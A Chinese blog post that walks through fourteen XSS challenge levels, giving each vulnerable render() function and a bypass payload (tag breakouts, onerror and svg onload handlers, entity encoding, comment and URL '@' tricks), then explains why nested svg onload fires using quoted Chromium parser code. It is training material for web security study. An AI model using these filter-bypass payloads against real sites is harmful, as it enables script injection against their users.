xss漏洞简单案例

已于 2023-03-03 22:46:45 修改
阅读量3.1k 收藏 6
点赞数
分类专栏: 前端 文章标签: xss 安全 前端
于 2022-07-29 16:13:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59280309/article/details/126055387
版权

目录

一:function render (input) {  return '

'}

二:function render (input) {  return '' + input + ''}

​编辑

三:function render (input) {  return ''}

 四:function render (input) {  const stripBracketsRe = /[()]/g  input = input.replace(stripBracketsRe, '')  return input}

五:function render (input) {  const stripBracketsRe = /[()`]/g  input = input.replace(stripBracketsRe, '')  return input}

六:function render (input) {  input = input.replace(/-->/g, '😂')  return ''}

七: function render (input) {  input = input.replace(/auto|on.*=|>/ig, '_')  return ``}

 八:

function render (input) {  const stripTagsRe = /<\/?[^>]+>/gi

  input = input.replace(stripTagsRe, '')  return `

${input}

`}

 九:function render (src) {  src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')  return `      `}

 十:function render (input) {  let domainRe = /^https?:\/\/www\.segmentfault\.com/  if (domainRe.test(input)) {    return ``  }  return 'Invalid URL'}

十一:

function render (input) {  function escapeHtml(s) {    return s.replace(/&/g, '&')            .replace(/'/g, ''')            .replace(/"/g, '"')            .replace(//g, '>')            .replace(/\//g, '/')  }

  const domainRe = /^https?:\/\/www\.segmentfault\.com/  if (domainRe.test(input)) {    return ``  }  return 'Invalid URL'}

​编辑 十二:function render (input) {  input = input.toUpperCase()  return `

${input}

`}

十三: function escape(input) {    // pass in something like dog#cat#bird#mouse...    var segments = input.split('#');    return segments.map(function(title) {        // title can only contain 12 characters        return '

';    }).join('\n');}

 ​编辑

十四:

function escape(input) {    // sort of spoiler of level 7    input = input.replace(/\*/g, '');    // pass in something like dog#cat#bird#mouse...    var segments = input.split('#');

    return segments.map(function(title, index) {        // title can only contain 15 characters        return '

';    }).join('\n');} 

svg命名空间 :

一:function render (input) {
  return '<div>' + input + '</div>'
}

 解法:

</div>
<script> alert(1)</script> //

题目:
function render (input) {
  return '<div>' + input + '</div>'
}

二:function render (input) {
  return '<textarea>' + input + '</textarea>'
}

 解法:

</textarea><script>alert(1)</script>


题目:
function render (input) {
  return '<textarea>' + input + '</textarea>'
}

三:function render (input) {
  return '<input type="name" value="' + input + '">'
}

解法: 

"><script>alert(1)</script>

题目:
function render (input) {
  return '<input type="name" value="' + input + '">'
}

 四:function render (input) {
  const stripBracketsRe = /[()]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

 解法:

<script>alert`1`</script>

题目:
function render (input) {
  const stripBracketsRe = /[()]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

五:function render (input) {
  const stripBracketsRe = /[()`]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

解法:

<img src=1 onerror="alert&#40;1&#41;"

题目:
function render (input) {
  const stripBracketsRe = /[()`]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

六:function render (input) {
  input = input.replace(/-->/g, '😂')
  return '<!-- ' + input + ' -->'
}

解法: 

--!><script>alert(1)</script><--

题目:
function render (input) {
  input = input.replace(/-->/g, '😂')
  return '<!-- ' + input + ' -->'
}

七: function render (input) {
  input = input.replace(/auto|on.*=|>/ig, '_')
  return `<input value=1 ${input} type="text">`
}

解法:

type="image" src=1 onerror
=alert(1)

题目:
function render (input) {
  input = input.replace(/auto|on.*=|>/ig, '_')
  return `<input value=1 ${input} type="text">`
}

 八:

function render (input) {
  const stripTagsRe = /<\/?[^>]+>/gi

  input = input.replace(stripTagsRe, '')
  return `<article>${input}</article>`
}

解法:

<img src=1 onerror="alert(1)"

题目:
function render (input) {
  const stripTagsRe = /<\/?[^>]+>/gi

  input = input.replace(stripTagsRe, '')
  return `<article>${input}</article>`
}

 九:function render (src) {
  src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
  return `
    <style>
      ${src}
    </style>
  `
}

解法:

</style
><script>alert(1)</script>

题目:
function render (src) {
  src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
  return `
    <style>
      ${src}
    </style>
  `
}

 十:function render (input) {
  let domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${input}"></script>`
  }
  return 'Invalid URL'
}

解法: 

http://www.segmentfault.com"></script><script>alert(1)</script>

题目:
function render (input) {
  let domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${input}"></script>`
  }
  return 'Invalid URL'
}

十一:

function render (input) {
  function escapeHtml(s) {
    return s.replace(/&/g, '&amp;')
            .replace(/'/g, '&#39;')
            .replace(/"/g, '&quot;')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/\//g, '&#x2f')
  }

  const domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${escapeHtml(input)}"></script>`
  }
  return 'Invalid URL'
}

解法:

http://www.segmentfault.com@127.0.0.1/test.js

//@ 可以重定向到@后面的连接中

题目:
function render (input) {
  function escapeHtml(s) {
    return s.replace(/&/g, '&amp;')
            .replace(/'/g, '&#39;')
            .replace(/"/g, '&quot;')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/\//g, '&#x2f')
  }

  const domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${escapeHtml(input)}"></script>`
  }
  return 'Invalid URL'
}

 

 十二:function render (input) {
  input = input.toUpperCase()
  return `<h1>${input}</h1>`
}

解法:

<svg/onload=&#97;&#108;&#101;&#114;&#116;(1)>

题目:
function render (input) {
  input = input.toUpperCase()
  return `<h1>${input}</h1>`
}

 

十三: function escape(input) {
    // pass in something like dog#cat#bird#mouse...
    var segments = input.split('#');
    return segments.map(function(title) {
        // title can only contain 12 characters
        return '<p class="comment" title="' + title.slice(0, 12) + '"></p>';
    }).join('\n');
}

 

 解法:

"><script>/*#*/prompt(/*#*/1)/*#*/</script>

题目:
function escape(input) {
    // pass in something like dog#cat#bird#mouse...
    var segments = input.split('#');
    return segments.map(function(title) {
        // title can only contain 12 characters
        return '<p class="comment" title="' + title.slice(0, 12) + '"></p>';
    }).join('\n');
}

十四:

function escape(input) {
    // sort of spoiler of level 7
    input = input.replace(/\*/g, '');
    // pass in something like dog#cat#bird#mouse...
    var segments = input.split('#');

    return segments.map(function(title, index) {
        // title can only contain 15 characters
        return '<p class="comment" title="' + title.slice(0, 15) + '" data-comment=\'{"id":' + index + '}\'></p>';
    }).join('\n');

 解法:

"><svg><!--#--><script><!--#-->prompt(<!--#-->1)<!--#--></script>


题目:
function escape(input) {
    // sort of spoiler of level 7
    input = input.replace(/\*/g, '');
    // pass in something like dog#cat#bird#mouse...
    var segments = input.split('#');

    return segments.map(function(title, index) {
        // title can only contain 15 characters
        return '<p class="comment" title="' + title.slice(0, 15) + '" data-comment=\'{"id":' + index + '}\'></p>';
    }).join('\n');
}

svg命名空间 :

为什么要加<svg>?
    <script>标签下只能存放文本,注释不会生效。<svg>是个命名空间,使用<svg>会切换到<svg>的命名空间内,遵循<svg>的语法格式(xml格式)。

命名空间:<html>,<svg>,<mathml>
这三个命名空间可以相互切换

SVG namespacehttps://www.w3.org/2000/svg

补充双<svg>绕过 ——可以在过滤代码执行以前,提前执行恶意代码

我们知道JS是通过DOM接口来操作文档的,而HTML文档也是用DOM树来表示。所以在浏览器的渲染过程中,我们最关注的就是DOM树是如何构建的。

<img src=1 onerror>

解析一份文档时,先由标记生成器做词法分析,将读入的字符转化为不同类型的Token,然后将Token传递给树构造器处理;接着标识识别器继续接收字符转换为Token,如此循环。实际上对于很多其他语言,词法分析全部完成后才会进行语法分析(树构造器完成的内容),但由于HTML的特殊性,树构造器工作的时候有可能会修改文档的内容,因此这个过程需要循环处理。

 

在树构建过程中,遇到不同的Token有不同的处理方式。具体的判断是在HTMLTreeBuilder::ProcessToken(AtomicHTMLToken* token)中进行的。AtomicHTMLToken是代表Token的数据结构,包含了确定Token类型的字段,确定Token名字的字段等等。Token类型共有7种,kStartTag代表开标签,kEndTag代表闭标签,kCharacter代表标签内的文本。所以一个<script>alert(1)</script>会被解析成3个不同种类的Token,分别是kStartTagkCharacterkEndTag。在处理Token的过程中,还有一个InsertionMode的概念,用于判断和辅助处理一些异常情况。

在处理Token的时候,还会用到HTMLElementStack,一个栈的结构。当解析器遇到开标签时,会创建相应元素并附加到其父节点,然后将token和元素构成的Item压入该栈。遇到一个闭标签的时候,就会一直弹出栈直到遇到对应元素构成的item为止,这也是一个处理文档异常的办法。比如<div><p>1</div>会被浏览器正确识别成<div><p>1</p></div>正是借助了栈的能力。

而当处理script的闭标签时,除了弹出相应item,还会暂停当前的DOM树构建,进入JS的执行环境。换句话说,在文档中的script标签会阻塞DOM的构造。JS环境里对DOM操作又会导致回流,为DOM树构造造成额外影响

void HTMLElementStack::PopAll() {
  root_node_ = nullptr;
  head_element_ = nullptr;
  body_element_ = nullptr;
  stack_depth_ = 0;
  while (top_) {
    Node& node = *TopNode();
    auto* element = DynamicTo<Element>(node);
    if (element) {
      element->FinishParsingChildren();
      if (auto* select = DynamicTo<HTMLSelectElement>(node))
        select->SetBlocksFormSubmission(true);
    }
    top_ = top_->ReleaseNext();
  }
}

void HTMLElementStack::PopCommon() {
  DCHECK(!TopStackItem()->HasTagName(html_names::kHTMLTag));
  DCHECK(!TopStackItem()->HasTagName(html_names::kHeadTag) || !head_element_);
  DCHECK(!TopStackItem()->HasTagName(html_names::kBodyTag) || !body_element_);
  Top()->FinishParsingChildren();
  top_ = top_->ReleaseNext();

  stack_depth_--;
}

当我们没有正确闭合标签的时候,如<svg><svg>,就可能调用到PopAll来清理;而正确闭合的标签就可能调用到其他出栈函数并调用到PopCommon。这两个函数有一个共同点,都会调用栈中元素的FinishParsingChildren函数。这个函数用于处理子节点解析完毕以后的工作。因此,我们可以查看svg标签对应的元素类的这个函数。

void SVGSVGElement::FinishParsingChildren() {
  SVGGraphicsElement::FinishParsingChildren();

  // The outermost SVGSVGElement SVGLoad event is fired through
  // LocalDOMWindow::dispatchWindowLoadEvent.
  if (IsOutermostSVGSVGElement())
    return;

  // finishParsingChildren() is called when the close tag is reached for an
  // element (e.g. </svg>) we send SVGLoad events here if we can, otherwise
  // they'll be sent when any required loads finish
  SendSVGLoadEventIfPossible();
}

这里有一个非常明显的判断IsOutermostSVGSVGElement,如果是最外层的svg则直接返回。注释也告诉我们了,最外层svg的load事件由LocalDOMWindow::dispatchWindowLoadEvent触发;而其他svg的load事件则在达到结束标记的时候触发。所以我们跟进SendSVGLoadEventIfPossible进一步查看。

bool SVGElement::SendSVGLoadEventIfPossible() {
  if (!HaveLoadedRequiredResources())
    return false;
  if ((IsStructurallyExternal() || IsA<SVGSVGElement>(*this)) &&
      HasLoadListener(this))
    DispatchEvent(*Event::Create(event_type_names::kLoad));
  return true;
}
先决条件 在于svg不能最外层 onload 必须保证不是最外层

这个函数是继承自父类SVGElement的,可以看到代码中的DispatchEvent(*Event::Create(event_type_names::kLoad));确实触发了load事件,而前面的判断只要满足是svg元素以及对load事件编写了相关代码即可,也就是说在这里执行了我们写的onload=alert(1)的代码。

戲子 鬧京城°ぃ
关注
专栏目录
XSS攻击实例1
01-11
简单让你了解xss攻击。 项目基于Asp.net 框架,VS2010下创建,C#语言
能够发现90%以上XSS漏洞的7个主要的XSS案例
weixin_42976700的博客
11-04 1872
在阅读有关XSS的材料时,我们通常会看到经典的<script> alert(1)</ script>作为这种漏洞的证明(PoC –概念证明)。尽管确实如此,但它并没有超出此范围,这使得该领域的新手可以寻求更多解决方案来应对现实情况。 因此,这是每个人都应该知道能够利用那里的绝大多数XSS缺陷的7种情况。建立了一个网页来显示它们的变化(单引号或双引号)来进行训练(单击以转到它): 在源代码的开头,有一个HTML注释,其中包含用于触发每种情况的所有参数。它们都适...
xss漏洞(四,xss常见类型)
最新发布
2302_80280669的博客
08-04 510
可缩放矢量图形)基于xml标记语言,用于描述二维的矢量图形,放大缩小不影响清晰度,可嵌入JavaScript代码。</svg>将要执行的恶意JavaScript代码嵌入到pdf中。
安全-反射性xss基础注入
m0_63069714的博客
11-08 370
题目中明确说明不能出现以下关键字(script|document|cookie|eval|setTimeout|alert),因此就将这些字符串进行拼接,在javascript中拼接字符串可以直接使用+,但是在url地址栏中,+会被url转义为空格,因此需要将+进行urlcode编码。其他原因与上次的题目相同。2、下面代码是通过正则表达式,将get上传的参数进行了过滤,将" ( ", " ) ", " & ", " \\ ", " < ", " > ", " ' "这些符号进行了替换,替换结果为空。
XSS漏洞实例利用
weixin_33720452的博客
07-17 547
上一篇说了一下XSS的原理,相信大家对XSS的原理有了一定的了解。今天给大家分享一下XSS漏洞的实例利用。环境:window 7 64位一台火狐浏览器就位外网云服务器一枚(我自己买的...)可XSS网站一匹获取Cookie的JS代码一套好了,以上就是需要准备的东西,没有的外网云服务...
了解xss漏洞简单案例
weixin_60719780的博客
11-08 1135
特点:仅执行一次,非持久性;参数型跨站脚本主要存在于攻击者将恶意脚本附加到url的参数中,发送给受害者,服务端未经严格过滤处理而输出在用户浏览器,导致浏览器执行代码的数据。攻击过程:​ U经常浏览某个网站A。U使用用户名/密码进行登录,并存储敏感信息(比如银行帐户信息)在网站A中。H发现A站点包含反射性的XSS漏洞,编写一利用漏洞的URL,并将其冒充为来自A的邮件给U。U在登录到A的站点后,浏览H供的URL。
XSS漏洞-01】XSS漏洞简介、危害与分类及验证
zz12345600354的博客
04-23 1072
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
XSS漏洞测试案例分享(原创)
gaomei2009的专栏
04-14 1903
直到今天才发现,只有写作才能让你把知识记牢。只有写作才能把日常工作的积累,不写记录,好记性不如烂笔头。以后每周会把自己工作中的渗透测试分享出来,对自己是一个积累的过程,对大家是一个共享。 一、工具扫描 个人建议使用XRAY工具,可以非常快速发现XSS漏洞,大把节约了手工渗透的时间。 二、手工测试 在应用系统中,在有人机交互的地方输入相关JS语句,例如 <img src=1 onerror=alert(1)> <script>alert("XSS")&l...
XSS漏洞
weixin_54475242的博客
03-20 595
XSS漏洞 XSS漏洞 十大漏洞之一 Xss被称为跨站脚本攻击,xss通过将精心构造的代码(JS)代码注入到网页,并由浏览器解释运行这段JS代码,达到恶意攻击的效果。当用户访问被XSS脚本注入的网页,XSS脚本就会被提取出来。用户浏览器就会解析这段XSS代码,也就是说用户被攻击了。 XSS的对象是用户和浏览器。微博,留言板,聊天室等等收集用户输入的地方,都有可能被注入XSS代码,都存在遭受XSS的风险,只要没有对用户的输入进行严格过滤,就会被XSS。 攻击者将恶意代码注入到服务器中 用户在没有防备的情况下
XSS漏洞——渗透day08
qq_62716256的博客
09-04 601
XSS漏洞——渗透day08
XSS漏洞总结和漏洞复现
weixin_45492087的博客
07-28 2382
跨站脚本攻击XSS(CrossSiteScripting),为区别层叠样式表(CascadingStyleSheets,CSS),所以改写为XSS
XSS漏洞解决方案实例
08-30
跨网站脚本(Cross-site scripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。
Ajax XSS样例
09-18
新浪此前遭遇的XSS攻击的实现源码,有兴趣可以研读一下
XSS漏洞挖掘及利用教程
07-31
XSS漏洞挖掘及利用教程,还有大量QQ邮箱的XSS和各种XSS漏洞实战解析哦!
XSS漏洞实例
Sumarua的博客
06-19 1192
xss闯关游戏 实战靶场:云演xss漏洞靶场 第一关 直接输出 (1)分析 XSS 测试中一般使用弹窗的方式进行测试。 (2)弹窗代码示例: 此时弹窗回显为1,说明我们输入的指令被成功执行,存在低级的xss漏洞 第二关 value 此时我们再执行这条命令时发现无反应,没有弹窗也没有回显 示例结果 第三关 简单过滤 又叫复写 ,是一种简单的绕过姿势 第四关 简单过滤 当我们输入带有alert的字符时会直接退出脚本执行 javascript中 prompt()方法用于显示一个带有提
XSS漏洞测试案例
weixin_51446936的博客
06-01 2246
1、获取cookie的原理和实验演示 《get型xss》 第一步:搭建xss的后台 打开pikachu xss的后台管理工具(在pikachu漏洞平台底部---->管理工具----->xss后台) 根据提示进行安装,修改配置文件,即数据库的账户和密码 接下来,根据提示进行安装/初始化,然后进行登录 后台登录成功 现在xss后台没有任何数据 第二步:先将pikachu中cookie.php改为自己本地的ip,重定向到一个可信的网站,我的ip如下 路径为:D:\phpstudy2018\P
XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
m0_64378913的博客
06-02 4462
(1)了解beEF工具的使用; (2)加深理解XSS漏洞的利用和危害; (3)掌握浏览器劫持的攻击方法; (4)掌握会话劫持的攻击方法; (5)掌握通过XSS漏洞GetShell的方法。
xssi漏洞案例分析
南迪叶先森
07-15 574
来源 在h1看到paypal的key信息泄露导致用户账户信息泄露,包括用户的用户名、邮箱等信息,并获得1.5w$奖金,分析完毕在freebuf上找到xssi相关文章,该文章在18年发布,但是当时对于该漏洞的看重程度还不是很高。 漏洞原理 XSSI被称为跨站脚本包含漏洞,通常在开发过程中对数据的临时存储,存储在动态javascript文件中,方便全局对数据的调用。该数据通过服务端生成,临时存储在js文件中,被客户端进行使用,通过该功能进行数据处理、身份认证等处理;问题在于通过对动态js的调用,我们可以通过嵌入
客户端XSS漏洞探索:从历史案例到防御策略
4. **历史案例**:腾讯QQ群和阿里旺旺的XSS漏洞展示了客户端应用在处理用户输入和富文本格式时的安全疏漏。这提示开发者不仅要关注服务器端的安全,客户端的安全同样重要。 5. **防御策略**:为了防范XSS攻击,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

戲子 鬧京城°ぃ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值